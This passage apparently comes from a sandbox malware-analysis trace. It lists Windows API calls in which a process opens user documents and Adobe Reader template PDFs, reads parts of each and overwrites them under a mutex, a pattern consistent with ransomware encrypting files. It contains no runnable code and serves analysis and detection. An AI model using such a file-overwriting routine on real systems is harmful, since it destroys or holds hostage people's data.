lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0072.702] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a4048*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a4048*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0072.702] CloseHandle (hObject=0x1d8) returned 1 [0072.703] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EYtXipHb6qYun5.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\eytxiphb6qyun5.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0072.703] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0072.703] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x5ae4 [0072.703] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0072.704] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.704] ReleaseMutex (hMutex=0x168) returned 1 [0072.704] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EYtXipHb6qYun5.doc", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0072.704] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EYtXipHb6qYun5.doc", cchWideChar=18, lpMultiByteStr=0x1f88b2c, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EYtXipHb6qYun5.doc", lpUsedDefaultChar=0x0) returned 18 [0072.704] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.705] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x4ae4 [0072.706] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.706] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x4ae4 [0072.706] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0072.707] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0072.707] WriteFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0072.707] CloseHandle (hObject=0x1d8) returned 1 [0072.708] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QBtOB97D\\MnMLEQT UCU fn8kOTsA.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qbtob97d\\mnmleqt ucu fn8kotsa.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0072.708] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0072.708] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x9cee [0072.708] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0072.708] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.709] ReleaseMutex (hMutex=0x168) returned 1 [0072.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MnMLEQT UCU fn8kOTsA.ods", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0072.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MnMLEQT UCU fn8kOTsA.ods", cchWideChar=24, lpMultiByteStr=0x1f8fd5c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MnMLEQT UCU fn8kOTsA.ods", lpUsedDefaultChar=0x0) returned 24 [0072.709] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0073.702] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x8cee [0073.702] ReadFile (in: hFile=0x1d8, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0073.702] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x8cee [0073.703] WriteFile (in: hFile=0x1d8, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0073.703] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0073.703] WriteFile (in: hFile=0x1d8, lpBuffer=0x25aa1a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25aa1a8*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0073.704] CloseHandle (hObject=0x1d8) returned 1 [0073.710] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHT\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cht\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0073.711] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0073.711] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x510a [0073.711] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0073.711] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0073.711] ReleaseMutex (hMutex=0x168) returned 1 [0073.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0073.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x1f7320c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefaultID.pdf", lpUsedDefaultChar=0x0) returned 13 [0073.712] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0073.714] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x410a [0073.714] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0073.714] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x410a [0073.714] WriteFile (in: hFile=0x1d8, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0073.715] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0073.715] WriteFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0073.715] CloseHandle (hObject=0x1d8) returned 1 [0073.715] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ENU\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\enu\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0073.716] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0073.716] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x13b0b [0073.716] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0073.716] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0073.716] ReleaseMutex (hMutex=0x168) returned 1 [0073.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0073.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefaultID.pdf", lpUsedDefaultChar=0x0) returned 13 [0073.716] ReadFile (in: hFile=0x1d8, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0073.720] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x12b0b [0073.720] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0073.737] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x12b0b [0073.738] WriteFile (in: hFile=0x1d8, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0073.739] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0073.739] WriteFile (in: hFile=0x1d8, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0073.740] CloseHandle (hObject=0x1d8) returned 1 [0073.740] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HUN\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\hun\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0073.741] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0073.741] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x15db2 [0073.741] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0073.741] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0073.742] ReleaseMutex (hMutex=0x168) returned 1 [0073.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0073.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x1f733cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefaultID.pdf", lpUsedDefaultChar=0x0) returned 13 [0073.742] ReadFile (in: hFile=0x1d8, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0073.747] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x14db2 [0073.748] ReadFile (in: hFile=0x1d8, lpBuffer=0x2667868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0073.748] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x14db2 [0073.748] WriteFile (in: hFile=0x1d8, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0073.750] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0073.750] WriteFile (in: hFile=0x1d8, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0073.750] CloseHandle (hObject=0x1d8) returned 1 [0073.751] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NLD\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\nld\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0073.752] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0073.752] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x10405 [0073.752] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0073.752] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0073.753] ReleaseMutex (hMutex=0x168) returned 1 [0073.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0073.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x1f7328c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefaultID.pdf", lpUsedDefaultChar=0x0) returned 13 [0073.753] ReadFile (in: hFile=0x1d8, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0073.771] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xf405 [0073.771] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0073.775] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xf405 [0073.775] WriteFile (in: hFile=0x1d8, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0073.776] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0073.776] WriteFile (in: hFile=0x1d8, lpBuffer=0x25aa0a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25aa0a8*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0073.776] CloseHandle (hObject=0x1d8) returned 1 [0073.777] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUM\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\rum\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0073.777] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0073.778] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x5be8 [0073.778] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0073.778] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0073.778] ReleaseMutex (hMutex=0x168) returned 1 [0073.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0073.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefaultID.pdf", lpUsedDefaultChar=0x0) returned 13 [0073.778] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0073.782] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x4be8 [0073.782] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0073.782] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x4be8 [0073.782] WriteFile (in: hFile=0x1d8, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0073.783] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0073.784] WriteFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0073.784] CloseHandle (hObject=0x1d8) returned 1 [0073.784] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SUO\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\suo\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0073.785] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0073.785] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x102c8 [0075.076] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0075.076] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.081] ReleaseMutex (hMutex=0x168) returned 1 [0075.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0075.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefaultID.pdf", lpUsedDefaultChar=0x0) returned 13 [0075.083] ReadFile (in: hFile=0x1d8, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0075.102] SetFilePointer (in: hFile=0x1d8, 